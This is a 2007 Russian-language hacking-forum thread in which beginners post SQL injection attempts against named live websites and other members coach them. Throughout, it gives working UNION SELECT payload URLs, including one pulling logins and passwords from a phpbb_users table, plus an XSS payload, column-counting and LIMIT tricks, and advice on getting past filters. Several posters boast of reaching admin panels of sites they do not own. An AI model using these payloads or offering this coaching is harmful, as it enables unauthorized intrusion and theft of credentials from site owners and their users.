Вопросы и проблемы с SQL-инъекциями (SQL-inj)
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-09-23 15:12:41.433333
|
|
|
Lex_Voodoo
Сообщений: 7328
Оценки: 0
Присоединился: 2004-12-07 13:55:12
|
Все вопросы в духе
А я нашёл сцылку http://microsoft.com?bla='id но т.к. я тупой то не знаю че дальше
отныне разрешается постить только в этот топег.
Отдельно созданные топеги будут направляться в корзину.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-09-23 22:03:09.010000
|
|
|
blacksun
Сообщений: 2360
Оценки: 0
Присоединился: 2006-09-27 03:05:59.350000
|
Доки по sql-injection:
http://www.inattack.ru/group_article/34.html
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-09-27 14:42:48.063333
|
|
|
niren
Сообщений: 7
Оценки: 0
Присоединился: 2007-07-05 12:24:29.826666
|
http://www.magicdrum.ru/shop.php?id=-1+union+select+1,user.usrname+from+mysql.user/*
помогите разобраться с ссылочкой…
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-09-27 15:02:37.686666
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
quote:
ORIGINAL: niren
http://www.magicdrum.ru/shop.php?id=-1+union+select+1,user.usrname+from+mysql.user/*
помогите разобраться с ссылочкой…
Прав самый минимум. Ищи скрипты, иначе не представляю, как ты сможешь подобрать таблицы(например с админами). Или забей :)
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-09-27 21:28:22.510000
|
|
|
ДомосеД
Сообщений: 13
Оценки: 0
Присоединился: 2007-09-27 15:20:50.583333
|
А я, вот нашел такую ахинею http://www.cosmetic.com.ua/articles/a18'
Но так ни4ё и не смог сделать толком. Пытался выводить имена таблиц, но опять ни4ё: acess denied-вроде. Мож просто толком не выу4ил, не то делал.
Так 4ё подможете, иль как?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-09-27 21:44:15.830000
|
|
|
dx
Сообщений: 337
Оценки: 0
Присоединился: 2006-12-15 13:35:49.700000
|
Там как минимум два запроса подряд делается с использованием уязвимого параметра, и разное число полей выбирается, поэтому union select скорее всего не осуществить.
Вот это - при подборе полей к первому запросу:
quote:
Invalid query articles 4:
SELECT * FROM art_list WHERE id=-18 union select 1,1,1
The used SELECT statements have a different number of columns
Вот это выводится потом после подбора числа полей к первому запросу (в таблице art_list их 4 поля):
quote:
Invalid query articles 2:
SELECT * FROM articles WHERE id_list=-18 union select 1,1,1,1 ORDER BY top
The used SELECT statements have a different number of columns
т.е. из таблицы articles выбирается не 4 поля.
Можно попробовать другую инъекцию найти.
К слову, там ещё xss присутствует:
http://www.cosmetic.com.ua/search/results/?phrase=<script>alert('xss')</script>&srch=1
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-09-27 23:02:40.670000
|
|
|
ДомосеД
Сообщений: 13
Оценки: 0
Присоединился: 2007-09-27 15:20:50.583333
|
Вот, вот эт и была у мя.
А xss я в первую очередь заметил, НО в xss я еще не разобрался, не знаю 4ё делать
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-09-28 19:44:38.416666
|
|
|
dx
Сообщений: 337
Оценки: 0
Присоединился: 2006-12-15 13:35:49.700000
|
Это не sql-инъекция скорее всего
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-09-28 20:26:44.980000
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
quote:
ORIGINAL: ДомосеД
А я, вот нашел такую ахинею http://www.cosmetic.com.ua/articles/a18'
Но так ни4ё и не смог сделать толком. Пытался выводить имена таблиц, но опять ни4ё: acess denied-вроде. Мож просто толком не выу4ил, не то делал.
Так 4ё подможете, иль как?
Я уже в админке ;)
Подсказка: ищи другие скрипты на этом сайте, которые будет проще заюзать.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-09-30 01:46:05.090000
|
|
|
UnVisible
Сообщений: 1
Оценки: 0
Присоединился: 2007-09-28 14:12:53.616666
|
Все, спасиб народ за моральную поддержку, я уже в админке 8D Такое чувство радости, покруче оргазма :D
Админов прошу, если можно, удалить мои посты, т.к. самому вродь невозможно. Плз.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-10-10 01:04:04.283333
|
|
|
junga
Сообщений: 3
Оценки: 0
Присоединился: 2007-10-10 00:44:15.393333
|
Вот решил отправиться в большое плавание хакинга ну и естественно первые рифы:
http://www.vatikan.ru/web_i/detail.php?id=5805+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+/*
узнал следующее:
USER() - vatikan9_slavon@localhost
VERSION() - 4.0.18-log
DATABASE() - vatikan9_vatikan
Дальше не получается.
Как узнать какие таблицы есть в базе?
Запрос типа:
http://www.vatikan.ru/web_i/detail.php?id=5805+UNION+SELECT+1,2,column_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33++from+nformation_schema.columns/*
дает ответ:
1142 select command denied to user: 'vatikan9_slavon@localhost' for table 'columns'
Ваши рекомендации?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-10-10 22:36:49.276666
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
Information_schema.columns появилась в mysql только в пятой версии
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-10-11 08:06:24.860000
|
|
|
xEEx
Сообщений: 1
Оценки: 0
Присоединился: 2007-10-11 07:53:03.610000
|
SQLinj ORDER+UNION вроде все просто, нужен совет
есть на сервере (посещаемость 3к юзеров в сутки) скриптик с известным исходником
$query = "SELECT id, date FROM post order by date desc LIMIT $start,$per_page "; так вот, в переменную $per_page можно загнать через _POST любое значение (даже с кавычками и слешами) но т.к. стоит ORDER то union не работает, выдает
Incorrect usage of UNION and ORDER BY
чтоб заработало - надо ставить скобки типа такого
(SELECT ... ORDER ...) union (SELECT ... ) но так ессно сделать нельзя, т.к. можно писать только в конец запроса через $per_page
нужно вытащить пароль (md5 пароля) pass из таблицы users, имя юзера известно или сделать себе статус админа (через UPDATE user_type в той же таблице)
вот собсно проблема, всем заранее спасибо за ответ
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-10-12 21:19:34.843333
|
|
|
junga
Сообщений: 3
Оценки: 0
Присоединился: 2007-10-10 00:44:15.393333
|
Dimonelite спасибо за ответ, но мне нужен совет, что сделать, что бы узнать эту информацию?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-10-12 22:46:54.676666
|
|
|
Copper
Сообщений: 7
Оценки: 0
Присоединился: 2007-10-02 11:24:30.230000
|
В MkPortal 1.1.1 есть язвимость связанная с просмотром галлереи. Описание есть на сайте. Я выполняю запрос при верном запросе возращается нормальная html страница без желаемой информации, при неверном страница что SQL-запрос неверен. Я посмотрел в скрипт MkPortal 1.1.1 в первом случае так и должно быть. Хотя sql-injection и работает, скрипт сам берет только первую запись, т.е. инфу о картинке. А теперь вопрос как мне увидеть результат на клиенте? Можно как-нибудь обновить данные из первой части запроса, что перед UNION и выдать результ через них?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-10-14 09:54:10.566666
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
quote:
ORIGINAL: junga
Dimonelite спасибо за ответ, но мне нужен совет, что сделать, что бы узнать эту информацию?
Если ответ "никак" тебя не устраивает… тогда ручками :) Пробуешь проверить все пришедшие тебе в голову названия таблиц.
quote:
ORIGINAL: Copper
А теперь вопрос как мне увидеть результат на клиенте?
На каком клиенте? Я ничего не понял.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-10-14 14:57:07.400000
|
|
|
KRESTOF
Сообщений: 26
Оценки: 0
Присоединился: 2007-10-07 04:06:18.716666
|
подскажите пожалуйста что дальше с этим делать
http://www.fasie.ru/index.php?rid=120`
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-10-14 22:02:27.656666
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
quote:
ORIGINAL: KRESTOF
подскажите пожалуйста что дальше с этим делать
http://www.fasie.ru/index.php?rid=120`
Повесить в рамочку и радоваться. Только так.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-10-15 09:57:50.640000
|
|
|
Copper
Сообщений: 7
Оценки: 0
Присоединился: 2007-10-02 11:24:30.230000
|
quote:
ORIGINAL: Dimonelite
На каком клиенте? Я ничего не понял.
В браузере, если сервер выполняет запрос, но возращает только первую строку sql-таблицы, т.е. описание картинки и автора.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-10-15 20:52:11.940000
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
quote:
ORIGINAL: Copper
quote:
ORIGINAL: Dimonelite
На каком клиенте? Я ничего не понял.
В браузере, если сервер выполняет запрос, но возращает только первую строку sql-таблицы, т.е. описание картинки и автора.
а в чем собственно проблема?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-10-16 20:14:21.030000
|
|
|
Copper
Сообщений: 7
Оценки: 0
Присоединился: 2007-10-02 11:24:30.230000
|
В том то и дело что результаты атаки начинаются со второй строки. А вы сами пробовали эту инъекцию?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-10-16 23:56:25.286666
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
Кажется доходит потихоньку, что ты имеешь ввиду. Смотри:
(например) select * from table where id=1 - стандартный запрос, который там по умолчанию.
select * from table where id=1 union select … /* - если выводится только первая строка, тогда разумеется тебе покажутся только строки, которые принадлежат условию where id=1.
а если написать
select * from tabl where id=-1 union select …/* ? ;)
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-10-17 09:46:06.706666
|
|
|
Copper
Сообщений: 7
Оценки: 0
Присоединился: 2007-10-02 11:24:30.230000
|
Тогда сайт выдает -> У вас нет прав для редактирования этого изображения. Вот мой запрос http://www.site.ru/index.php?ind=gallery&op=edit_file&iden=1+UNION+SELECT+NULL%2Clogin%2Cpassword%2CNULL%2CNULL+FROM+phpbb_users+WHERE+user_id=2. Часть http://www.site.ru/index.php?ind=gallery&op=edit_file&iden= стандартная. Далее грузим изображение на сервер и запоминаем его iden. Это позволит нам выполнить инъекцию UNION+SELECT+NULL%2Clogin%2Cpassword%2CNULL%2CNULL+FROM+phpbb_users+WHERE+user_id=2. Она и выполняется в результате имеем таблицу 1 -строка NULL,Название_картинки,Описание,NULL,NULL и 2 строка NULL,Admin,Password,NULL,NULL. Но браузер возратит только первую строку. В догонку, если невозможно вывести вторую строку, как мне составить запрос вида UNION UPDATE …, т.е. вслепую рулить базой данных??
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-10-17 14:50:05.793333
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
quote:
ORIGINAL: Copper
Тогда сайт выдает -> У вас нет прав для редактирования этого изображения. Вот мой запрос http://www.site.ru/index.php?ind=gallery&op=edit_file&iden=1+UNION+SELECT+NULL%2Clogin%2Cpassword%2CNULL%2CNULL+FROM+phpbb_users+WHERE+user_id=2. Часть http://www.site.ru/index.php?ind=gallery&op=edit_file&iden= стандартная. Далее грузим изображение на сервер и запоминаем его iden. Это позволит нам выполнить инъекцию UNION+SELECT+NULL%2Clogin%2Cpassword%2CNULL%2CNULL+FROM+phpbb_users+WHERE+user_id=2. Она и выполняется в результате имеем таблицу 1 -строка NULL,Название_картинки,Описание,NULL,NULL и 2 строка NULL,Admin,Password,NULL,NULL. Но браузер возратит только первую строку. В догонку, если невозможно вывести вторую строку, как мне составить запрос вида UNION UPDATE …, т.е. вслепую рулить базой данных??
1)iden = -1 union select …
2)union select … from phpbb_users limit 0,1
3)union update - unreal.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-10-19 11:29:18.840000
|
|
|
Copper
Сообщений: 7
Оценки: 0
Присоединился: 2007-10-02 11:24:30.230000
|
1) Ещё раз при iden = -1 union select -> Ошибка, нет прав редактировать изображение
2) Попробую, а что делает limit 0,1. Если на сайте vBulletin -> то как называется столбец с пользователями и паролями??
3) Получается добавить можно только выборку?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-10-19 21:56:51.046666
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
quote:
ORIGINAL: Copper
1) Ещё раз при iden = -1 union select -> Ошибка, нет прав редактировать изображение
2) Попробую, а что делает limit 0,1. Если на сайте vBulletin -> то как называется столбец с пользователями и паролями??
3) Получается добавить можно только выборку?
1)видимо выбирается какое-то поле, которое отвечает например за права на изображение. попробуй union select 0,0,0,…
2)limit [OFFSET],COUNT
0,1 - первая строчка
1,1 - вторая
2,1 - третья
и т.д.
3)ничего ты не добавишь, разве что union select … into table …, но тогда в исходном выражении и в той таблице, куда ты хочешь добавить строку, должно быть одинаковое количество столбцов. если так вообще можно сделать…
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-10-24 04:44:35.666666
|
|
|
kritagent
Сообщений: 1
Оценки: 0
Присоединился: 2007-10-24 04:36:08.346666
|
приветствую всех мне хотелось бы узнать я нашел сайт в кторо id=2-1 равняется id=1 если ставлю кавычку то выпадает ошибка но команды которые пытаюсь прописать не получаются узнал что на сайте с помощью php скрипта производится фильтрование и этот скрипт превращает запросы в несуразицу подскажите возможно ли каким нибудь способом обойти этот скрипт для того что бы произвести sql инъекцию извините если что то не так описал я только начинаю[sm=bc.gif]
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-10-25 00:00:06.496666
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
Так как сказать "убейся", значит ничего не сказать, то:
1)Учи русский, пунктуацию.
2)Либо конкретно описывай проблему, либо давай ссылку на конкретную уязвимость, если хочешь, чтобы тебе помогли.
>но команды которые пытаюсь прописать не получаются
какие команды? что именно не получается? нифига не понятно.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-10-30 21:02:01.563333
|
|
|
relline
Сообщений: 38
Оценки: 0
Присоединился: 2005-11-06 17:22:25
|
Код защиты от SQL-иньекций
quote:
function antiinjection($str)
{
$banwords = array ("'", ",", ";", "–","DROP", "SELECT", "UPDATE", "DELETE", "-");
if (eregi("[a-zA-Z0-9]+", $str))
{
$str = str_replace($banwords, '', $str);
}
else
{
$str = NULL;
}
return $str;
}
Больше никаких фильтраций входных параметров нет и ограничений на длину тожею
Возможно ли при такой проверки провисти иньекцию,, И если да то каким образомю
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-10-31 06:02:50.816666
|
|
|
Lex_Voodoo
Сообщений: 7328
Оценки: 0
Присоединился: 2004-12-07 13:55:12
|
relline - вопрос с точки зрения взломщика или кодера? Если кодера - читай http://forum.xakep.ru/fb.aspx?m=655311
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-10-31 15:13:10.640000
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
Наверно такая проверка спасет от sql-inj. Т.к. никаких разделителей даже не засунуть. Другое дело, что подобный код не всегда можно использовать, потому что далеко не все легальные строки выдержат такую жесткую фильтрацию.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-10-31 15:26:47.810000
|
|
|
relline
Сообщений: 38
Оценки: 0
Присоединился: 2005-11-06 17:22:25
|
quote:
ORIGINAL: Lex_Voodoo
relline - вопрос с точки зрения взломщика или кодера? Если кодера - читай http://forum.xakep.ru/fb.aspx?m=655311
С точки зрения взломщика. Собствено проблема: мне нужно чуток подредактировать значения в базе, название таблиц и полей в них я знаю, есть передача параметра indx который используется так:
quote:
$result=mssql_query("
SELECT *
FROM (SELECT TOP 10000 a.char_name, a.Lev, a.builder, a.class, a.use_time,
a.PK, a.Duel, a.gender, a.Exp, a.char_id, a.login, a.logout, b.name, b.pledge_id
FROM user_data as a
left join user_showinstat as c on a.char_id=c.char_id
left join pledge as b on a.Pledge_id=b.pledge_id
WHERE char_name not in (".("'".join("','",$exclude_from_top)."'").") and (account_id>0) and (builder = 0) and (class = N'$indx')
ORDER BY Exp Desc) DERIVEDTBL
order by exp desc");
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-02 13:18:12.080000
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
Если $indx предварительно проходит ту фильтрацию, то из строки убираются кавычки. Как тут инъекцию в основной sql-запрос провести, даже за кавычки не выйдешь?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-02 16:22:46.200000
|
|
|
Prodex
Сообщений: 4
Оценки: 0
Присоединился: 2007-10-09 19:49:35.473333
|
SQL_инъекция[как оптимальнее подбирать поля]
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-02 16:42:37.033333
|
|
|
Prodex
Сообщений: 4
Оценки: 0
Присоединился: 2007-10-09 19:49:35.473333
|
http://www.rosmed.ru/news.php?act=by_id&news_id=130' , а что дальше то …???
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-02 20:16:17.166666
|
|
|
FriLL
Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
|
http://www.rosmed.ru/news.php?act=by_id&news_id=-130+unon+select+1,2,3 и т.д. пока ошибка не исчезнет
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-02 21:33:43.723333
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
quote:
ORIGINAL: Prodex
http://www.rosmed.ru/news.php?act=by_id&news_id=130' , а что дальше то …???
в запросе 32 поля. подбирать количество можно например через order by, в инете море статей по основам sql-inj, прочитай хотя бы одну, прежде чем задавать здесь вопросы.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-05 13:51:26.473333
|
|
|
Kda
Сообщений: 1
Оценки: 0
Присоединился: 2007-11-05 13:41:01.243333
|
Здравствуйте! Обнаружил сайт объявлений, где в тексте объявлений, если ввести двойную кавычку, выводится ошибка. Решил попробовать сделать инъекцию, но сайт все время выдавал ошибки. Привожу ниже текст ошибок.
SQL Error :: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION SELECT * FROM sale UNION INSERT INTO sale SET text="", price="", user_name' at line 1 (1064)
SQL Query :: INSERT INTO sale SET cat_id="20", name="1", text="" UNION SELECT * FROM sale UNION INSERT INTO sale SET text="", price="", user_name="", user_email="", user_phone="", is_sale="1", city_id="0", date="1194268307"
SQL Error :: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '; SELECT * FROM sale ; INSERT INTO sale SET text="", price="", user_name="", use' at line 1 (1064)
SQL Query :: INSERT INTO sale SET cat_id="20", name="1", text="" ; SELECT * FROM sale ; INSERT INTO sale SET text="", price="", user_name="", user_email="", user_phone="", is_sale="1", city_id="0", date="1194268416"
SQL Error :: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union select null/* union insert into sale set text="", price="", user_name="", ' at line 1 (1064)
SQL Query :: INSERT INTO sale SET cat_id="20", name="1", text="" union select null/* union insert into sale set text="", price="", user_name="", user_email="", user_phone="", is_sale="1", city_id="0", date="1194268977"
SQL Error :: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '; select null/* union insert into sale set text="", price="", user_name="", user' at line 1 (1064)
SQL Query :: INSERT INTO sale SET cat_id="20", name="1", text="" ; select null/* ; insert into sale set text="", price="", user_name="", user_email="", user_phone="", is_sale="1", city_id="0", date="1194269044"
SQL-инъекция в GET ничего не дает - выводится та же страница. Подскажите, что делать, пожалуйста, я ни разу до этого ничего не ломал.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-05 22:00:48.360000
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
UNION после INSERT - это мечты. Ищи инъекцию в SELECT запросе.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2007-11-07 23:09:11.223333
|
|
|
Toxic_gl
Сообщений: 17
Оценки: 0
Присоединился: 2007-11-07 22:52:34.470000
|
нашел глючный сай и сталкнулся с ошибкой что делать незнаю
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Ошибка базы меню SELECT * from leftmenu1_c where id=1\' в index.php
|
|
|
|
|
|
